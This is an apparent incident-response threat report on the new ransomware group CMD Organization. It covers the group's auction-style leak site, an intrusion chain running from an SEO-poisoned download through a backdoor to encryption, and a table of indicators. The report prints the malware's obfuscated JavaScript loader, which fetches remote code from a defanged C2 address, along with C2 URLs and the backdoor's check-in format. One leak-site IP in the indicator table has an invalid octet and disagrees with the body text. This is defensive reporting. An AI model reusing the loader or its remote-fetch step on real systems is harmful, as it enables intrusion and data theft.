- May 14, 2026
CMD Organization – New Ransomware Operator Moves to Place Public Bidding Wars on Ransomed Data
In April, Beazley Security’s incident response team was called in after a newly surfaced affiliate calling themselves CMD Organization deployed ransomware and exfiltrated data from a victim organization. By way of adding a bidding platform within its leak site, the group allows potential buyers to participate directly in the extortion process. In this post, we document what our responders uncovered about CMD Organization and explore their leaksite.
Executive Summary
Recently, Beazley Security’s incident response team was called in after a newly surfaced threat actor group calling themselves CMD Organization deployed ransomware and exfiltrated data from a victim organization. This engagement represents one of the earliest confirmed intrusions attributed to the group, only weeks after their public emergence in late March.
What distinguishes CMD Organization from other ransomware operators is what they’re attempting to do with the stolen data. By adding a bidding platform within its leak site, the group allows potential buyers to participate directly in the extortion process alongside victim negotiations.
While the group demonstrated ability to execute end-to-end ransomware operations, our observed incident reveals limited ransomware locker functionality, a likely dependence on outsourced tooling, and a leak site deployed so quickly it exposed the attacker’s original hosting infrastructure.
Key Findings
CMD Organization is a new ransomware actor with confirmed activity beginning in late March 2026.
CMD Organization has introduced a crypto bidding concept on its leak site, expanding monetization opportunity while amplifying victim pressure through public pricing and bids.
Observed tradecraft from the new group reflects a potentially well-networked operator but with limited operational maturity, possibly leveraging initial access brokers (IABs) and limited original tooling.
CMD Organization Background
CMD Organization is an emerging ransomware group that first posted victims to their public leak site in early April 2026. CMD Organization’s operating model appears similar to other ransomware operators, leveraging double extortion by both encrypting and exfiltrating data to ransom for profit. In the investigation our responders handled, several weeks of dwell time were observed between initial access and ransomware deployment. While it cannot be confirmed, the gap is consistent with groups that buy access from IABs rather than gaining access on their own.
Additional review of tradecraft and capability indicates the group may be operating with purchased or outsourced tooling. The ransomware locker exhibits a limited feature set when compared to binaries from other groups. CMD’s locker lacks built-in propagation capability and performance options seen within more mature examples from other groups. Although able to effectively execute their attack, we assess the group as less mature in operations and more dependent on outsourced access methods and tooling.
The subtle practice of using commas for monetary fractions within their bidding panel suggests the platform may be developed outside of Western influence. At the time of writing, the group has posted five victims on their leak site.
CMD Organization Leak Site and Bidding Platform
The earliest signs of CMD Organization infrastructure surfaced in late March. Beazley Security Labs identified a TLS certificate for cmdofficial[.]com logged on March 29th, 2026, and DNS records for the clearnet site were registered through Namecheap the same day, aligning with the public launch of the group’s ransomware-as-a-service (RaaS) operation.
Figure 1: CMDOfficial Leaksite
Less conventionally, we observed that CMD Organization integrates a crypto bidding platform directly into their public leak site, in an attempt to convert stolen data into an auctionable asset prior to leaking information to other threat actors for free. The group’s auction-based extortion model expands monetization opportunities by reducing dependence on negotiating processes with victims while simultaneously increasing negotiation pressure as auctions are placed on the victim’s data.
If CMD Organization can shift part of the traditional ransom and extortion process away from private negotiations to public bidding opportunities, selling exclusive access to stolen data could increase the price according to the given demand of an actor. Locking the sale to a single buyer could empower the winner with exclusive access to the stolen data, giving time to sift through and operationalize credentials, identities, customer records, or other sensitive information before it is circulated to competing threat actors.
Higher-tier criminal forums marketing illicit data today gate access through paywalls or reputation checks, constraining the buyer pool. With public access and open data samples, anyone with a browser and bitcoin wallet can theoretically participate. Potential buyers can access the “CMDOfficial” leak site through clearnet or their anonymized Tor site to review data and place bids, documented in the IoCs section of this post.
Figure 2: CMDOfficial Leaksite Bid Form
We couldn’t help but test the bidding panel and were able to enter in a desired amount of crypto. On submission, the site returned a message that our bid had been placed successfully and that a seller would be in contact. Interestingly, we were not required to enter any wallet information or provide a small verification deposit, a telling sign that the functionality is in beta or conceptual phases. As of writing, we have not received a response from CMD operators.
Following the bidding process, the admins of the leak site appear to make downloads publicly available, assuming that no successful bid was made.
Leak Site Hosting
Panel infrastructure for the group was provisioned in late March, with DNS records updated again on March 31st, likely to move the site behind Cloudflare, in an attempt to obscure the underlying host and preserve availability.
Figure 3: CMDOfficial DNS Records
At the time of investigation, the clearnet leak site was proxied behind Cloudflare, with historical DNS data linking earlier resolution of the site to the IP address 209.99.186[.]211. CMD Organization also maintains a Tor (.onion) leak site listed in our IoCs section that mirrors the clearnet content. Behind Cloudflare, the site appears to run on an Ubuntu build and served through an nginx proxy.
Figure 4: CMDOfficial Shodan Record (5/7/2026)
Incident Overview
Beazley Security Incident Response observed CMD Organization ransomware in a recent investigation, where our responders documented the group’s operational tradecraft and ambitions firsthand. Below, we dive into the initial access vector, lateral movement, persistence, related tooling and malware, and the CMD-branded ransomware locker.
The following attack chain depicts either direct CMD Organization activity or an affiliate operating with the same ransomware locker:
Figure 5: Attack Chain
Initial Access and Dwell Time
Initial access was achieved through an SEO-poisoned lure within Bing’s search ecosystem, tricking the victim into downloading a fake PDF in the form of an archive. The archive contained a malicious, encoded JavaScript loader that, when decompressed, resembles the below:
GetObject("\u0073c\u0072i\u0070\u0074le\u0074:h\u0074\u0074\u0070://0\u0078a763e94e/m\u0062d");/*!\u98ac\xed-\x46\u7e18\x77-\u1d42 X-\x0a\x1e\u324e*/
Deobfuscated - GetObject("scriptlet:hxxp://167.99.233[.]78/mbd");
This JavaScript loader, executed via Windows utility cscript.exe, immediately runs a complex, obfuscated PowerShell payload. The PowerShell malware ships with anti-analysis functionality and frequently connects back to the 167.99.233[.]78 Command and Control (C2) server to grab more code snippets. After several check-ins, it unpacks the following C2 URL string into memory:
hxxp://213.165.47[.]49/b0c9ed38f2b14c119546.php
Multiple security vendors have flagged this URL and method of loading into memory as a potential StealC indicator. After executing in the victim’s environment, little to no forensic evidence of malicious activity immediately appeared, and responders in fact observed an unusually long dwell time of around 25 days before encryption was deployed by CMD Organization’s locker.
Long dwell times are a common indicator of an IAB at play. A separate actor compromises the environment, holds access, and then sells it to whomever deploys the final payload in attempt to extort and monetize the victim in the event of a ransomware case. While we cannot confirm this, we assess that CMD Organization likely sourced their access from an IAB, rather than establishing it independently.
Lateral Movement
The threat actor made use of Advanced IP Scanner for additional reconnaissance once inside the environment, a network scanning utility package that we commonly see in ransomware engagements. After initial mapping recon, Invoke-SMBRemoting was used with harvested credentials from the original victim’s account to perform remote command execution. This script is publicly available from a GitHub repo and can be used to create “fileless” interactive shells or execute commands remotely by loading into memory.
Backdoor Persistence
The threat actor deployed a backdoor DLL that our investigation flagged as “Meow” backdoor. This naming comes from the fact that the only significant function export name in the DLL is “Meow”:
Figure 6: DLL Backdoor Exports
With the proliferation of threat actors integrating third-party malware products in their toolkits, we did not find prior reporting on the backdoor with the specific “Meow” keyword. This does not imply that this backdoor is uncommon, however, as these strings often vary across individual threat actor deployments. What may be of more use to investigators is the malware’s C2 server hosted at 188.190.2[.]165:666. The malware sends the following check-in string via HTTPS:
{"IsAdmin":true,"Username":"<username>","Domain":"<domain>","OSVersion":"<os version>""PcName":"<pc name>"}
Persistence for this backdoor was achieved by staging PowerShell scripts as startup items into the victim’s HKEY_USERs run registry keys. The keys were deceptively named “Install Microsoft Teams” and assigned an iterative fake version number of the software:
Figure 7: Persistence in Run Key
Data Exfiltration
Although data exfiltration was confirmed by the threat actor in this case, evidence of the tooling and exfiltration destination were destroyed and not obtainable this investigation.
Encryption
The CMD locker binary was propagated through the victim network via GPO and SYSVOL. In this case, the threat actor used filenames “paste1.exe”.
Initial analysis of the CMD locker binary itself is straightforward. Like many other ransomware families, it uses a combination of Chacha20 and RSA with an embedded public key when encrypting files. The private key would be needed to decrypt and attempt recovery of compromised data.
The locker has functionality to perform both full and partial file encryption, though in this case only full encryption appears to have been used. On execution, it drops an HTML ransomware note and opens it in Chrome after the encryption process finishes:
Figure 8: CMD Ransom Note
Unlike other new ransomware variants like Vect, the observed CMD Organization locker does not appear to provide additional features outside of encryption functionality, such as built-in lateral movement or other performance enhancements for deployment.
We are continuing to analyze the locker and will provide an in-depth update once completed.
Indicators of Compromise (IoCs)
Infrastructure
Indicator | Description |
cmdofficial[.]com | CMD Organization clear net leak site |
209.99.286[.]211 | Leak site hosting IP (as of 5/7/2026) |
AS402253 | Leak site hosting ASN |
cmdnkiqjije2tllr3biee2sjgj3i4robg2cbtilbnytdhh2wy3syrlyd[.]onion | CMD Organization Tor leak site |
Contacts
Indicator | Description |
cmd2official@onionmail[.]org | CMD Organization Email |
Cmdhtmnjksgkuhilrtrh@onionmail[.]org | CMD Organization Email |
MitsueWhite@onionmail[.]org | CMD Organization Email |
JedAdams@onionmail[.]org | CMD Organization Email |
Network
Indicator | Description |
188.190.2[.]165[:]666 | Meow backdoor C2 |
213.165.47[.]49 | Infostealer Infrastructure |
167.99.233[.]78 | Infostealer Infrastructure |
URLs
Indicator | Description |
hxxps://clubsoar[.]com/fd/patricia%20va%20a%20california%20pdf.zip | Malvertisement payload delivery |
hxxps://artistichairlounge[.]com/bestbooklibrarycom/template.php?q=patricia%20va%20a%20california%20pdf | Malvertisement payload delivery |
hxxp://213.165.47[.]49/b0c9ed38f2b14c119546.php | Infostealer Infrastructure |
hxxp://167.99.233[.]78/mbd | Infostealer Infrastructure |
Files & Tools
File | Hash | Description |
paste1.exe | 07c14b82f673ba5caa8c1188f052ea31583f0af7 | CMD locker |
Patricia-va-a-california-pdf.zip | 69aa0eeab454e6967e9c860d02749857b0b4c4ea8c55ba0c1a1af12af5a25bca | Malvertisement payload binary |
qlgdhgk.ps1 | 8ed2c2e67ae8d3cfe1fca15d5c7b33e7011bb8dd | Infostealer PowerShell |
qu.ps1 | c18cef4610d272caa3c51ec5803439aff3b4982e | Infostealer PowerShell |
Netdrv.dll | 463554c76a0aa472daf9b42e9414942910b4ac54 | Meow backdoor |
Advanced_Port_Scanner_2.5.3869.exe | Network reconnaissance tool | |
Invoke-SMBRemoting | Abused for Lateral Movement and Execution | |
Openssl.exe | Abused for Proxy tunnel | |
__README__.html | CMD Organization ransom note |